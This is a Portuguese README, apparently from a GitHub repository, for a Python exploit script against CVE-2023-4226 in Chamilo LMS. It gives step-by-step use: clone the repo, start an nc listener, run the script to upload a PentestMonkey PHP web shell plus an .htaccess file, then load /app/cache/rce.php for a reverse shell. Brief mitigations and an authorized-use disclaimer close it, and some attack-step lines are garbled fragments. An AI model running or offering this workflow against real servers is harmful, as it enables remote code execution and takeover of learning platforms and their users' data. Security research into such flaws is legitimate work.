
Vulnerabilidade de upload de arquivos sem restrições no **Chamilo LMS** (<= v1.11.24).
Script em Python que automatiza a exploração de CVE-2023-4226, uma vulnerabilidade de carregamento de arquivos sem restrições no Chamilo LMS (<= v1.11.24). Envia um web shell PHP baseado no PentesterMonkey e configura .htaccess para obter uma reverse shell. Mais detalhes: Advisory da STAR Labs.
/main/inc/ajax/work.ajax.php, obtendo RCE.ch_sid).rce.php com IP e porta./main/work/work.php?cidReq=HW./main/inc/ajax/work.ajax.php para enviar rce.php e .htaccess./app/cache/rce.php).Python: requests, colorama.
pip install requests colorama
Arquivos: rce.php (PentesterMonkey, incluído no repositório), .htaccess (gerado pelo script).
Rede: IP e porta para o listener (ex. nc -lvnp 4444).
Clone o repositório:
git clone https://github.com/SkyW4r33x/CVE-2023-4226
cd CVE-2023-4226
Atribua permissões de execução ao script:
chmod +x CVE-2023-4226.py
Instale dependências:
pip install requests colorama
Inicie o listener num terminal:
nc -lvnp 4444
Execute o script:
./CVE-2023-4226.py
Insira:
ch_sid.Aceda ao web shell para iniciar a reverse shell:
http://<chamilo>/app/cache/rce.php
Exemplo: http://chamilo.local/app/cache/rce.php
Atualize para Chamilo >= v1.11.26.
Sanitize nomes de arquivos.
Bloqueie HTML em disable_dangerous_file().
Adicione ao .htaccess:
RedirectMatch 403 ^/main/inc/lib/javascript/bigupload/files
Header set X-Content-Type-Options nosniff
Uso exclusivo para testes autorizados. O uso não autorizado é ilegal.